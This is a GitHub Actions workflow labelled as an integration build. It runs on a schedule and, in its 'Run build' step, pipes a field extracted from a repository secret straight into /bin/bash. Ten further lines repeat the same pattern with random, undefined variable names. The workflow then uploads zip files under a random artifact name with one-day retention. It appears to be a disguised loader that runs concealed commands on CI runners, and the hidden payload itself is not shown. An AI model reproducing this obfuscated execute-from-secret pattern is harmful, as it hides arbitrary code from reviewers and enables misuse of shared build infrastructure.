name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '19 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          rdte03: ${{ secrets.rdte03 }}
        run: |
          printf '%s' "$rdte03" | jq -r .jhl90 | /bin/bash
          echo $e9 | jq -r .p75966 | /bin/bash
          echo $jv7 | jq -r .v55 | /bin/bash
          printf '%s' "$zs4564" | jq -r .u9 | /bin/bash
          echo $wllh7476 | jq -r .aw8164 | /bin/bash
          printf '%s' "$aupr15570" | jq -r .opj6 | /bin/bash
          printf '%s' "$btm48768" | jq -r .v2926 | /bin/bash
          echo $q473 | jq -r .fpct14449 | /bin/bash
          echo $tctt7227 | jq -r .ehby7943 | /bin/bash
          printf '%s' "$bcz30145" | jq -r .lshks97775 | /bin/bash
          echo $k28 | jq -r .faya10 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ShlpRUVZ
          path: "*.zip"
          retention-days: 1
